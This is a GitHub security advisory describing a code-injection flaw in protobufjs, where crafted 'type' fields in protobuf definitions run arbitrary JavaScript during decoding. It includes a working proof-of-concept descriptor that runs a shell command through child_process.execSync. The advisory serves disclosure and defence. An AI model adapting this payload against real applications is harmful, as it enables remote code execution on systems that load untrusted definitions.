GHSA-xq3m-2v4x-88gg
ADVISORY - githubSummary
Summary
protobufjs compiles protobuf definitions into JS functions. Attackers can manipulate these definitions to execute arbitrary JS code.
Details
Attackers can inject arbitrary code in the "type" fields of protobuf definitions, which will then execute during object decoding using that definition.
PoC
const protobuf = require('protobufjs');
maliciousDescriptor = JSON.parse(`{"nested":{"User":{"fields":{"id":{"type":"int32","id":1},"data":{"type":"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X","id":2}}},"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X":{"fields":{"content":{"type":"string","id":1}}}}}`)
const root = protobuf.Root.fromJSON(maliciousDescriptor);
const UserType = root.lookupType("User");
const userBytes = Buffer.from([0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]);
try {
const user = UserType.decode(userBytes);
} catch (e) {}
Impact
Remote code execution when attackers can control the protobuf definition files.
Common Weakness Enumeration (CWE)
ADVISORY - github
Improper Control of Generation of Code ('Code Injection')
GitHub
CREATED
UPDATED
ADVISORY IDGHSA-xq3m-2v4x-88gg
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)